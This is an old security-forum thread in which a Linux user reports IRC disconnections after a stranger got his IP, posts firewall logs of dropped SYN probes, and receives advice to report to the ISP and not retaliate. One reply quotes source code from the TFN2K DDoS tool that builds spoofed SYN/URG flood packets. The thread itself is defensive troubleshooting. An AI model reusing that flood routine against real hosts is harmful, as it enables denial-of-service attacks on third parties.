found my IP and knocking me off IRC
Page 1 of 2 12 LastLast
Results 1 to 10 of 16

Thread: found my IP and knocking me off IRC

  1. #1
    AO BOFH: Luser Abuser BModeratorFH gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177

    found my IP and knocking me off IRC

    todayi was in a chat room and this skript kiddie got my IP, i keep getting disconnected from chat and also he said he used my PC in a SYN flood against routers or something, and also i got knocked off AIM and when i tried connecting it said my password was invalid, so i tried again and it worked, half my list was on away and everyone on away isnt on now, im not sure whats goin on, i have SuSe Linux 8.1 professional and i have the SuSefirewall running....any ideas? i didnt think you could do that on Linux so fast. my IP doesnt change because im on cable so thats kinda....not cool.

    EDIT: AIM seems fine now but i didnt think a kiddie could honestly do that with an IP addy, he said something about trying to get me arrested and then said hes just playing, but this is a bit much of a "coincidence" my AIM knocks me off and doesnt wanna work for a sec and then i get knocked off chat.
    Kill the lights, let the candles burn behind the pumpkins’ mischievous grins, and let the skeletons dance. For one thing is certain, The Misfits have returned and once again everyday is Halloween.The Misfits FreeBSD
    Cannibal Holocaust
    SuSE Linux
    Slackware Linux

  2. #2
    Super Moderator
    Know-it-All Master Beaver

    Join Date
    Jan 2003
    Posts
    3,914
    Did you see/log any activity on a Packet Logger/IDS? Do you have any services running that could be exploited? Did you notice a bandwidth loss (was it a Ping Timeout from IRC?) or did you just loss the connections?

    My initial response without having too much to go on would be that it's some script kiddie who's either got himself a few DDoS servers set-up or else has a half-decent Smurf broadcast list.

  3. #3
    AO BOFH: Luser Abuser BModeratorFH gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    yea hes got about 1,000 DDOS set ups, i dont have any servers on here because i dont use it for anything like that, i started up ksnuffle and there wasalot of actvity but it was from my ISP i think, it was showing up as from my ISP, im gunna check out the logs in a sec here.
    Kill the lights, let the candles burn behind the pumpkins’ mischievous grins, and let the skeletons dance. For one thing is certain, The Misfits have returned and once again everyday is Halloween.The Misfits FreeBSD
    Cannibal Holocaust
    SuSE Linux
    Slackware Linux

  4. #4
    Senior Member
    Join Date
    Apr 2002
    Posts
    1,049
    Hmm sounds like he could be SYN flooding you and thats why you may be getting knocked off IRC and gAIM try logging whats happening a temporary solution would be firestarter that logs in real time and you will be able to drop packets from offending IP's
    By the sacred **** of the sacred psychedelic tibetan yeti ....We\'ll smoke the chinese out
    The 20th century pharoes have the slaves demanding work
    http://muaythaiscotland.com/

  5. #5
    AO BOFH: Luser Abuser BModeratorFH gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    *EDIT: i just saw prodikals post, when i boot up, it says it starts syn flood protection, also right now im not on Gaim im on AIM from AOL, i downloaded the new AIM for Linux they have, and also thanks guys for checking this out.

    Heres a part from my Logs:
    I changed the destination IP for secure reasons.

    Apr 12 04:48:51 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=210.184.76.245 DST=changed.for.securityReasons LEN=60 TOS=0x00 PREC=0x00 TTL=42 ID=54207 DF PROTO=TCP SPT=57725 DPT=21 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101080A00A916520000000001030300)

    Apr 12 04:48:54 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=210.184.76.245 DST=same LEN=60 TOS=0x00 PREC=0x00 TTL=42 ID=54208 DF PROTO=TCP SPT=57725 DPT=21 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101080A00A9177E0000000001030300)

    Apr 12 04:49:00 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=210.184.76.245 DST=same LEN=60 TOS=0x00 PREC=0x00 TTL=42 ID=54209 DF PROTO=TCP SPT=57725 DPT=21 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101080A00A919D60000000001030300)

    Apr 12 04:49:12 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=210.184.76.245 DST=same LEN=60 TOS=0x00 PREC=0x00 TTL=42 ID=54210 DF PROTO=TCP SPT=57725 DPT=21 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101080A00A91E860000000001030300)


    Apr 12 05:49:52 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST=same LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=61860 DF PROTO=TCP SPT=36451 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:49:52 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST=same LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=12543 DF PROTO=TCP SPT=36452 DPT=8080 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:49:52 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST=same LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=21451 DF PROTO=TCP SPT=36453 DPT=3128 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:49:52 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST=same LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=28973 DF PROTO=TCP SPT=36454 DPT=6588 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:49:52 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST=same LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=53667 DF PROTO=TCP SPT=36458 DPT=23 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:49:52 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST=same LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=2472 DF PROTO=TCP SPT=36457 DPT=23 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:49:52 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=31650 DF PROTO=TCP SPT=36459 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:49:55 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=61861 DF PROTO=TCP SPT=36451 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:49:55 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=12544 DF PROTO=TCP SPT=36452 DPT=8080 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:49:55 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=21452 DF PROTO=TCP SPT=36453 DPT=3128 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:49:55 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=28974 DF PROTO=TCP SPT=36454 DPT=6588 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:49:55 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=2473 DF PROTO=TCP SPT=36457 DPT=23 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:49:55 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=53668 DF PROTO=TCP SPT=36458 DPT=23 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:49:55 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=31651 DF PROTO=TCP SPT=36459 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:00 linux /USR/SBIN/CRON[8871]: (root) CMD ( /usr/lib/sa/sa1 )

    Apr 12 05:50:01 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=61862 DF PROTO=TCP SPT=36451 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:01 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=12545 DF PROTO=TCP SPT=36452 DPT=8080 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:01 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=21453 DF PROTO=TCP SPT=36453 DPT=3128 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:01 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=28975 DF PROTO=TCP SPT=36454 DPT=6588 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:01 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=2474 DF PROTO=TCP SPT=36457 DPT=23 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:01 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=53669 DF PROTO=TCP SPT=36458 DPT=23 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:01 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=31652 DF PROTO=TCP SPT=36459 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:13 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=61863 DF PROTO=TCP SPT=36451 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:13 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=12546 DF PROTO=TCP SPT=36452 DPT=8080 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:13 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=21454 DF PROTO=TCP SPT=36453 DPT=3128 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:13 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=28976 DF PROTO=TCP SPT=36454 DPT=6588 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:13 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=2475 DF PROTO=TCP SPT=36457 DPT=23 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:13 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=53670 DF PROTO=TCP SPT=36458 DPT=23 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:13 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=31653 DF PROTO=TCP SPT=36459 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:51:30 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=216.65.55.2 DST= LEN=60 TOS=0x00 PREC=0x00 TTL=37 ID=57440 DF PROTO=TCP SPT=57143 DPT=3128 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40402080A3B0A33690000000001030300)

    Apr 12 05:51:30 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=216.65.55.2 DST= LEN=60 TOS=0x00 PREC=0x00 TTL=37 ID=29762 DF PROTO=TCP SPT=57144 DPT=8080 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40402080A3B0A33690000000001030300)

    Apr 12 05:51:30 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=216.65.55.2 DST= LEN=60 TOS=0x00 PREC=0x00 TTL=37 ID=58250 DF PROTO=TCP SPT=57145 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40402080A3B0A33690000000001030300)

    Apr 12 05:51:33 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=216.65.55.2 DST= LEN=60 TOS=0x00 PREC=0x00 TTL=37 ID=57441 DF PROTO=TCP SPT=57143 DPT=3128 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40402080A3B0A39690000000001030300)

    Apr 12 05:51:33 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=216.65.55.2 DST= LEN=60 TOS=0x00 PREC=0x00 TTL=37 ID=29763 DF PROTO=TCP SPT=57144 DPT=8080 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40402080A3B0A39690000000001030300)

    Apr 12 05:51:33 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=216.65.55.2 DST= LEN=60 TOS=0x00 PREC=0x00 TTL=37 ID=58251 DF PROTO=TCP SPT=57145 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40402080A3B0A39690000000001030300)

    Apr 12 05:51:39 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=216.65.55.2 DST= LEN=60 TOS=0x00 PREC=0x00 TTL=37 ID=57442 DF PROTO=TCP SPT=57143 DPT=3128 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40402080A3B0A45690000000001030300)

    Apr 12 05:51:39 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=216.65.55.2 DST= LEN=60 TOS=0x00 PREC=0x00 TTL=37 ID=29764 DF PROTO=TCP SPT=57144 DPT=8080 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40402080A3B0A45690000000001030300)

    Apr 12 05:51:39 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=216.65.55.2 DST= LEN=60 TOS=0x00 PREC=0x00 TTL=37 ID=58252 DF PROTO=TCP SPT=57145 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40402080A3B0A45690000000001030300)

    EDIT2:

    hmmm, his IP is

    66.169.81.235....he challenged me thinking id retaliate...oh well at least i got an IP out of it. it is actually his but im not sure what good thatll doo, iv never had a thing like this happen before.
    Kill the lights, let the candles burn behind the pumpkins’ mischievous grins, and let the skeletons dance. For one thing is certain, The Misfits have returned and once again everyday is Halloween.The Misfits FreeBSD
    Cannibal Holocaust
    SuSE Linux
    Slackware Linux

  6. #6
    Don't retaliate gore. That will get you in trouble instead of him.

    Since you have got his IP find out what you can about him. He could allready have rooted that box so it might belong to an 'inocent' victim (they should allready be firewalled that's why I used the '').

    Report it to the appropriate authorities. Also notify your own ISP of this behaviour.

  7. #7
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,324
    File a complaint with his ISP. I had that happen once and the attacker actually got blackballed from area ISPs (granted this was in the early 90s). It looks like it is a SYN/URG attack. Could it be a DRDoS or a DDoS? I'd think that'd be the only way he'd be able to fully wipe you out.

    The closest named attack I could find is a Kamikaze Packet, which seems to be a variation of the Christmas tree scan.

    Bingo! (I was researching as I was writing this) -- Trinoo 2k (TFN2K). It's a packet of that, I believe. One of the portions of the TFN2K has something called flood.c. This has the following:

    {
    struct sa sin;
    struct ip *ih = (struct ip *) synb;
    struct tcp *th = (struct tcp *) (synb + sizeof (struct ip));
    ih->ver = 4;
    ih->ihl = 5;
    ih->tos = 0x00;
    ih->tl = sizeof (ih) + sizeof (th);
    ih->id = htons (getrandom (1024, 65535));
    ih->off = 0;
    ih->ttl = getrandom (200, 255);
    ih->pro = TCP;
    ih->sum = 0;
    ih->src = k00lip ();
    ih->dst = victim;
    th->src = htons (getrandom (0, 65535));
    if (port > 0)
    th->dst = htons (port);
    else
    th->dst = htons (getrandom (0, 65535));
    th->seq = htonl (getrandom (0, 65535) + (getrandom (0, 65535) << 8));
    th->ack = htons (getrandom (0, 65535));
    th->flg = SYN | URG;
    th->win = htons (getrandom (0, 65535));
    th->sum = 0;
    th->urp = htons (getrandom (0, 65535));
    th->sum = ip_sum ((u16 *) synb, (sizeof (struct ip) + sizeof (struct tcp) + 1) & ~1);
    ih->sum = ip_sum ((u16 *) synb, (4 * ih->ihl + sizeof (struct tcp) + 1) & ~1);
    sin.fam = AF_INET;
    sin.dp = th->dst;
    sin.add = ih->dst;
    sendto (rawsock, synb, 4 * ih->ihl + sizeof (struct tcp), 0, (struct sockaddr *) &sin, sizeof (sin));
    }
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head
    Extra! Extra! Get your FREE copy of Insight Newsletter||MsMittens' HomePage

  8. #8
    Member
    Join Date
    Oct 2001
    Posts
    76
    That is not the actual attack. The first scan is a scan for an FTP server, possibly from a compromised host. The IP address resolves to quadzilla.alcatraz-media.com. Their web site is just a blank black page, which seems strange for a live web site.

    The second scan is just a standard proxy scan, probably from the IRC network you connected to. That IP resolves to several hostnames, one of which is a bit of a giveaway. Telnetting to port 6667 of this host confirms this:-
    host 200.69.212.165
    165.212.69.200.in-addr.arpa domain name pointer www.isecom.com.ar.
    165.212.69.200.in-addr.arpa domain name pointer www.isecommayorista.com.ar.
    165.212.69.200.in-addr.arpa domain name pointer chat.socios.mutualmas.com.ar.
    165.212.69.200.in-addr.arpa domain name pointer foro.socios.mutualmas.com.ar.

    The final scan is also a proxy scan, but the address doesn't resolve to any hostname. It is based in the far east, and the only explanation I can think of is that the IRC network you use scans you from 2 locations to ensure you don't have an undetected open proxy. This address has something running on port 6667, but I don't really know what it is. It doesn't seem to be an IRC server, but I could be wrong...

    As for the attacker, the best solution is definately report him to his ISP. This will get better results than retaliating, possibly against the wrong host. Getting knocked offline could've just been the attacker doing an nmap scan against you. I know for certain some IRC clients drop out with nmap scans, I accidentally found out when someone requested I scan them.

    More likely though, he DDoS'ed you, and either way, it's worth complaining to his ISP. Provide them with IRC logs, /whois output so they can see his hostname (provided he's not using a bouncer), firewall logs, and any other evidence you might have. With evidence, the more the merrier, provided it's relevant.

  9. #9
    is this the source code for a flood??? what is it?

  10. #10
    Kwiep
    Join Date
    Aug 2001
    Posts
    924
    I agree with Beryllium9 on the logged packets, they're either a really primitve portscan or just a proxyscan. I don't know if you got other things during the attack (if it was an attack even). I'd like to know some more about the person itself. What was the chat room you were talking about ? What made you sure it was a scriptkiddie ? I know it's easy to download some scripts and use them etc., but there are also still people like blackhats. Those also have skill in malicious actions, but they won't bother about you if you didn't do anything to them... Do you know for sure you were attacked at all ? If the guy has 1,000 DDOS setups or whatever it means you just can't reach anything, because yer bandwith get's spoiled. Unless it is fired to exploit something there won't crash anything. You use linux and you have a firewall. Didn't gaim or anything just crash on you or something ?

    Ow my post is a mess again...
    Double Dutch

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •